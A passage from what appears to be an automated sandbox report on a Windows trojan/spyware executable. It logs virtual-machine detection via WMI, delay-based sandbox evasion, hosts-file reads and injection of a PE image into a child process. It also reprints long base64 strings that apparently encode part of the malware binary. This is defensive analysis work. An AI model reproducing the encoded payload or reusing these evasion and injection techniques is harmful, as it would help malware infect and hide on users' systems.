UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTlI5QVFBQUFBQUFTQUFBQUFJQUJRQXdvUUFBVk53QUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3hjQUFBb0tBbjRMQVFBRUpTMFhKbjRLQVFBRS9nYTZBUUFHY3hnQUFBb2xnQXNCQUFRb0FRQUFLMjhhQUFBS0N6aW9BZ0FBQjI4YkFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT2NBQUFRb0hBQUFDbk1kQUFBS29pVVhIbzFIQUFBQkpkRGZBQUFFS0J3QUFBcHpIUUFBQ3FJbEdCMk5Sd0FBQVNYUTVBQUFCQ2djQUFBS2N4MEFBQXFpS01JQUFBWnZIZ0FBQ2d3NElnSUFBQklDS0I4QUFBb05jN01CQUFZVEJIUHNBQUFHRXdVUkJINGdBQUFLZlFrQkFBUitJQUFBQ2hNR0VRUUpjeUVBQUFvb0lnQUFDbThqQUFBS2ZRa0JBQVFSQkhzSkFRQUVIdytOUndBQUFTWFE3d0FBQkNnY0FBQUtjeDBBQUFwdkpBQUFDaXdhSG8xSEFBQUJKZERhQUFBRUtCd0FBQXB6SFFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRcHdBQUJDZ2NBQUFLY3gwQUFBcHlBUUFBY0g0Z0FBQUtLQ1VBQUFvb0pnQUFDbThrQUFBS0xRNFJCSHNKQVFBRUtNVUFBQVlyREJFRWV3a0JBQVFveEFBQUJoTUdFUVlvSndBQUNqb3lBUUFBRVFZV2J5Z0FBQW9UQ0JJSUtDa0FBQXB2S2dBQUNoRUdGaGR2S3dBQUNpZ3NBQUFLRXdZUkJIc0pBUUFFS01NQUFBWVRCeEVIS0NjQUFBbzY4Z0FBQUJFRkVRWnY0QUFBQmhFRkVRZHY0Z0FBQmhFRkVRVCtCclFCQUFaekxRQUFDbjRNQVFBRUpTMFhKbjRLQVFBRS9nYTdBUUFHY3k0QUFBb2xnQXdCQUFRb0FnQUFLMi9rQUFBR0VRVVJCUDRHdFFFQUJuTXZ
                    Source: 4.0.JEPayKhzWa.exe.ef0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csBase64 encoded string: 'VServiceModelChannelsWebSocketTransportDuplexSessionChannelcDisplayClass49144FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQU9OQ2ZxQUFBQUFBQUFBQUFPQUFBZ0VMQVRBQUFIQUJBQUFNQUFBQUFBQUE4bjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFLQjlBUUJQQUFBQUFLQUJBT1FFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQUNFZlFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUE4R3dCQUFBZ0FBQUFjQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU9RRUFBQUFvQUVBQUFnQUFBQjBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZkFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTlI5QVFBQUFBQUFTQUFBQUFJQUJRQXdvUUFBVk53QUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3hjQUFBb0tBbjRMQVFBRUpTMFhKbjRLQVFBRS9nYTZBUUFHY3hnQUFBb2xnQXNCQUFRb0FRQUFLMjhhQUFBS0N6aW9BZ0FBQjI4YkFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT2NBQUFRb0hBQUFDbk1kQUFBS29pVVhIbzFIQUFBQkpkRGZBQUFFS0J3QUFBcHpIUUFBQ3FJbEdCMk5Sd0FBQVNYUTVBQUFCQ2djQUFBS2N4MEFBQXFpS01JQUFBWnZIZ0FBQ2d3NElnSUFBQklDS0I4QUFBb05jN01CQUFZVEJIUHNBQUFHRXdVUkJINGdBQUFLZlFrQkFBUitJQUFBQ2hNR0VRUUpjeUVBQUFvb0lnQUFDbThqQUFBS2ZRa0JBQVFSQkhzSkFRQUVIdytOUndBQUFTWFE3d0FBQkNnY0FBQUtjeDBBQUFwdkpBQUFDaXdhSG8xSEFBQUJKZERhQUFBRUtCd0FBQXB6SFFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRcHdBQUJDZ2NBQUFLY3gwQUFBcHlBUUFBY0g0Z0FBQUtLQ1VBQUFvb0pnQUFDbThrQUFBS0xRNFJCSHNKQVFBRUtNVUFBQVlyREJFRWV3a0JBQVFveEFBQUJoTUdFUVlvSndBQUNqb3lBUUFBRVFZV2J5Z0FBQW9UQ0JJSUtDa0FBQXB2S2dBQUNoRUdGaGR2S3dBQUNpZ3NBQUFLRXdZUkJIc0pBUUFFS01NQUFBWVRCeEVIS0NjQUFBbzY4Z0FBQUJFRkVRWnY0QUFBQmhFRkVRZHY0Z0FBQmhFRkVRVCtCclFCQUFaekxRQUFDbjRNQVFBRUpTMFhKbjRLQVFBRS9nYTdBUUFHY3k0QUFBb2xnQXdCQUFRb0FnQUFLMi9rQUFBR0VRVVJCUDRHdFFFQUJuTXZ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/25@5/1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JEPayKhzWa.exe.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2C38.tmpJump to behavior
                    Source: JEPayKhzWa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: JEPayKhzWa.exeVirustotal: Detection: 60%
                    Source: JEPayKhzWa.exeReversingLabs: Detection: 62%
                    Source: unknownProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe 'C:\Users\user\Desktop\JEPayKhzWa.exe'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: JEPayKhzWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: JEPayKhzWa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: JEPayKhzWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: JEPayKhzWa.exeStatic PE information: 0x99CD706E [Sun Oct 8 11:35:10 2051 UTC]
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_00F73509 push ss; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_00F73148 push ss; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 3_2_002C3148 push ss; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 3_2_002C3509 push ss; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_00EF3509 push ss; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_00EF3148 push ss; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_0305F100 push ecx; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_03052877 push ebx; ret
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD9C82 push ss; iretd
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWindow / User API: threadDelayed 924
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWindow / User API: threadDelayed 8008
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe TID: 7100Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe TID: 6432Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477
                    Source: JEPayKhzWa.exe, 00000004.00000002.721021785.0000000006AE6000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: JEPayKhzWa.exe, 00000004.00000002.721021785.0000000006AE6000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareA3VLLWVCWin32_VideoControllerP5LP2SPGVideoController120060621000000.000000-000832.2960display.infMSBDAHSFMW4GFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors1SSOX79Zk
                    Source: JEPayKhzWa.exe, 00000004.00000002.720977141.0000000006AC3000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareA3VLLWVCWin32_VideoControllerP5LP2SPGVideoController120060621000000.000000-000832.2960display.infMSBDAHSFMW4GFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors1SSOX79ZT771ROOT\//?U
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeMemory written: C:\Users\user\Desktop\JEPayKhzWa.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Users\user\Desktop\JEPayKhzWa.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Users\user\Desktop\JEPayKhzWa.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
